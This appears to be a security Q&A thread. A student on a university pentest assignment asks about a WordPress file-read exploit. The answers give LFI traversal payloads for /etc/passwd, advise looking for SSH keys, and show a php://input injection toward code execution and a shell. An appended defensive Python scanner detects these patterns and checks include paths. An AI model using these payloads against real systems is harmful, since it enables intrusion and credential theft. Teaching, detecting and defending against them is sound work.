
While penetration testing for a university assignment, I found an exploit that might be the one the teacher has been hinting at, found here:

https://www.exploit-db.com/exploits/45439/

I used it and got access to the etc/passwd file (which doesn't tell me anything that I do not already know), as well as some other files that do not give any info.

I have tried to access the files that contain important info like the files in folders var/log, etc/shadow, proc/self, etc.

All I get is either permission denied or a 404...

Should I keep looking at this exploit or just forget about it? I can't execute any code so far, not even ls -a or anything.

System info:

  • Ubuntu server
  • WordPress
  • directory listing enabled
  • 3 users on WordPress, and I identified the SSH user
  • MySQL DB (doesn't show on nmap)

Any help or hint would be appreciated. Thanks.

MonaH

2 Answers


Could you run the affected site with wpscan to find vulnerabilities? You can enumerate a lot of things such as users, themes, plugins, timthumbs, and more. It will also scan for vulnerabilities on the site and say what the vulnerability can do. Scan the site with wpscan to make sure there are actual vulns on the site.

zucc0nit

The vulnerability that you have identified is known as LFI, or Local File Inclusion, and allows an attacker to read files from the server through a browser.

You do not need to use a pre-made exploit to leverage this vulnerability. In your browser navigate to the site and simply add ?file=../../../../../../../../../../../../etc/passwd to the end of the URL.

Using LFI, you have found the /etc/passwd file, which allows you to see users on a system. What I personally do when this vulnerability is present is test for RFI, or remote file inclusion, which will allow for the execution of scripts.

In either case, I'd use Burp to intercept the traffic, send it over to Repeater and then use it there for speed. You should be able to simply change the URL slightly to navigate through the directories. I'd take a look at the .ssh folder, and see if there are any keys that could be used to SSH into the box.

If you want / need more info on any of these topics leave a comment and I'll add to this answer. Best of luck with your assignment.

EDIT: if the site is running PHP, it may be possible to inject PHP into the page and start moving towards RCE (Remote Code Execution) and getting a shell. It can be accomplished by adding ?language=php://input@cmd=ls for a listing command, for example.

Connor J
  • Yes sir, I understand what you're saying, but the exploit wouldn't let me move anywhere from the etc folder. Each time I try, it just fails. I'm starting to think this isn't the clue they were talking about – MonaH Oct 24 '18 at 16:33
  • And btw, LFI isn't available on the site without this exploit. Doing it on the URL will just give me an "oops! that page can't be found" – MonaH Oct 24 '18 at 16:38
  • @MonaH try again, I fixed the syntax of the ../../ comment. LFI is still present on the site, even without using the exploit, just not exploiting it correctly ;) – Connor J Oct 24 '18 at 16:59
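From the defending side, the two patterns this answer describes (a `../` traversal in a file parameter, and a `php://` stream wrapper or remote URL in an include parameter) are exactly what a web-server log review or a hardened include routine should catch. The following is an added example, not code from the question, the answers, or WordPress: it scans constructed Apache combined-format log lines for those patterns after URL-decoding (so percent-encoded and double-encoded traversal is not missed), and shows the path-containment check that a safe `include` of a user-supplied filename needs. The plugin path, IPs and timestamps in the sample lines are made up.

```python
import os
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (Apache combined format); not taken from the post.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Oct/2018:16:33:01 +0000] "GET /wp-content/plugins/example/view.php?file=../../../../etc/passwd HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
10.0.0.5 - - [24/Oct/2018:16:34:12 +0000] "GET /wp-content/plugins/example/view.php?file=%2e%2e%2f%2e%2e%2fetc%2fshadow HTTP/1.1" 403 199 "-" "Mozilla/5.0"
10.0.0.5 - - [24/Oct/2018:16:35:40 +0000] "GET /index.php?language=php://input HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [24/Oct/2018:16:36:02 +0000] "GET /index.php?page=http://203.0.113.9/x.txt HTTP/1.1" 404 0 "-" "curl/7.58"
10.0.0.9 - - [24/Oct/2018:16:37:15 +0000] "GET /wp-content/uploads/2018/10/photo.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
"""

# Minimal combined-log-format parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\)')                      # ../ or ..\ anywhere in a value
WRAPPER_RE = re.compile(r'^(php|data|expect|phar|zip|file)://', re.IGNORECASE)  # PHP stream wrappers
REMOTE_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)        # remote include (RFI) attempt


def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double-encoded payloads (%252e -> %2e -> .) are unmasked."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_target(target):
    """Return (param, tag) findings for one request target's query-string parameters."""
    findings = []
    query = urlsplit(target).query
    for name, raw in parse_qsl(query, keep_blank_values=True):
        val = decode_fully(raw)
        if TRAVERSAL_RE.search(val):
            findings.append((name, "lfi-traversal"))
        if WRAPPER_RE.match(val):
            findings.append((name, "php-wrapper"))
        if REMOTE_RE.match(val):
            findings.append((name, "rfi-remote-url"))
    return findings


def scan_log(text):
    """Scan combined-format log text; return one alert dict per suspicious request, in order."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_target(m.group("target"))
        if findings:
            alerts.append({
                "ip": m.group("ip"),
                "status": int(m.group("status")),
                "target": m.group("target"),
                "tags": sorted({tag for _, tag in findings}),
            })
    return alerts


def safe_include_path(base_dir, requested, allowed_ext=(".php",)):
    """Resolve a user-supplied filename under base_dir for inclusion.

    Returns the resolved absolute path, or None when the request uses a stream wrapper,
    is an absolute path, escapes base_dir after normalisation, or has an unexpected
    extension. This containment check is what a bare include($_GET['file']) lacks.
    """
    if "://" in requested or requested.startswith(("/", "\\")):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not candidate.endswith(allowed_ext):
        return None
    return candidate


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ip"], alert["status"], alert["tags"], alert["target"])
    print(safe_include_path("/var/www/html", "pages/home.php"))
    print(safe_include_path("/var/www/html", "../../../../etc/passwd"))
```

Note that a 403 or 404 in the log does not mean the attempt was harmless; the second sample line shows a percent-encoded traversal that the web server refused, but the same request against a different parameter may be served, so alert on the request pattern rather than only on the status code.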